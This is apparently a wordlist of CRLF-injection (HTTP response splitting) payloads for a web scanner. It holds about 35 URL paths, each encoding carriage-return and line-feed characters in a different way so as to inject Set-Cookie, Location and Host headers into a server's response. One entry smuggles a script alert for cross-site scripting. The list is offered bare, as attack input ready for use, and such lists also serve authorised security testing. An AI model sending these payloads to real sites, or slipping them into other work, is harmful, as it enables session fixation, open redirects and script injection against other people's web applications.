/\r\nHost: {{Hostname}}\r\nCookie: roninja=roninja\r\n\r\nHTTP/1.1 200 OK\r\nSet-Cookie: roninja=roninja\r\n\r\n
/%0d%0aHost:%20{{Hostname}}%0d%0aCookie:%20roninja=roninja%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aSet-Cookie:%20roninja=roninja%0d%0a%0d%a
//www.google.com/%2F%2E%2E%0D%0Aroninja-x:roninja-x
/www.google.com/%2E%2E%2F%0D%0Aroninja-x:roninja-x
/www.google.com/%2F..%0D%0Aroninja-x:roninja-x
/%3f%0d%0aLocation:%0d%0aroninja-x:roninja-x%0d%aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
/%0d%0ahost:%20www.google.com
/%0d%0ahost:%20www.google.com%0d%0a
/%5Cr%5Cnhost:%20www.google.com%5Cr%5Cn
/%0d%0aLocation:www.google.com%0d%0a
/%0d%0aSet-Cookie:roninja=roninja;
/%0dSet-Cookie:roninja=roninja;
/%0aSet-Cookie:roninja=roninja;
/%5Cr%5Cn%5CtSet-Cookie:roninja=roninja;
/%5Cr%5CtSet-Cookie:roninja=roninja;
/%E5%98%8A%E5%98%8DLocation:www.google.com
/%E5%98%8D%E5%98%8ALocation:www.google.com
/%E5%98%8D%E5%98%8ASet-Cookie:roninja=roninja
/%E5%98%8A%E5%98%8DSet-Cookie:roninja=roninja
/%5CrSet-Cookie:roninja=roninja;
/%5Cr%20Set-Cookie:roninja=roninja;
/%5Cr%5CnSet-Cookie:roninja=roninja;
/%5Cr%5Cn%20Set-Cookie:roninja=roninja;
/%u000ASet-Cookie:roninja=roninja;
/%23%0D%0ALocation:www.google.com;
/%5cr%5cnLocation:www.google.com
/%E5%98%8A%E5%98%8D%0D%0ASet-Cookie:roninja=roninja;
/\r\nhost:%20www.google.com\r\n
/\r\n\tSet-Cookie:roninja=roninja;
/\r\nSet-Cookie:roninja=roninja;
/\r\n%20Set-Cookie:roninja=roninja;
/\r\tSet-Cookie:roninja=roninja;
/\r\nLocation:www.google.com
/\rSet-Cookie:roninja=roninja;
/\r%20Set-Cookie:roninja=roninja;
